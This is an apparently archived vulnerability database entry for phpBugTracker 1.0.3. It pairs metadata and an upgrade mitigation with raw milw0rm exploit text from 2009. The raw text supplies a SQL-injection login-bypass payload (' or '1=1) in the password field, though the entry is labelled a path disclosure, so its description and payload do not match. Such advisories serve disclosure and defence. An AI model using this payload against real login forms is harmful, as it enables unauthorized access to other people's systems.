Vendor: phpBugTracker
By: ByALBAYX
CVSS: 7.5 (HIGH)
Path Disclosure Vulnerability
CWE: 200
Product Name: phpBugTracker
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbt:phpbugtracker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpBugTracker 1.0.3 Path Disclosure Vulnerability

A vulnerability in phpBugTracker 1.0.3 discloses the application's path to an attacker who sends a specially crafted HTTP request. The attacker can then use the disclosed path to launch further attacks.

Mitigation:

Upgrade to phpBugTracker 1.0.4 or later.

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG
@~~===============TURKISH=================~~@

              _.--"""""--._
            .'             '.
           /                 \
          ;       C4TEAM      ;
          |                   |
          |                   |
          ;                   ;                   ByALBAYX
           \ (`'--,    ,--'`) /
            \ \  _ )  ( _  / /                 WWW.C4TEAM.ORG
             ) )(')/  \(')( (
            (_ `""` /\ `""` _)
             \`"-, /  \ ,-"`/                       
              `\ / `""` \ /`
               |/\/\/\/\/\|                      
               |\        /|
               ; |/\/\/\| ;
                \`-`--`-`/
                 \      /
                  ',__,'


@~~=======================================~~@
@~~=Script   : phpBugTracker 1.0.3

@~~=S.Site   : http://phpbt.sourceforge.net

@~~=Demo     : http://phpbt.sourceforge.net/demo
@~~=======================================~~@

@~~=Vul :

@~~=http://c4team.org/ [Path] /index.php

@~~=Email     : xxx@c4team.org

@~~=Password  : ' or '1=1

@~~=======================================~~@

@~~=:/

# milw0rm.com [2009-05-26]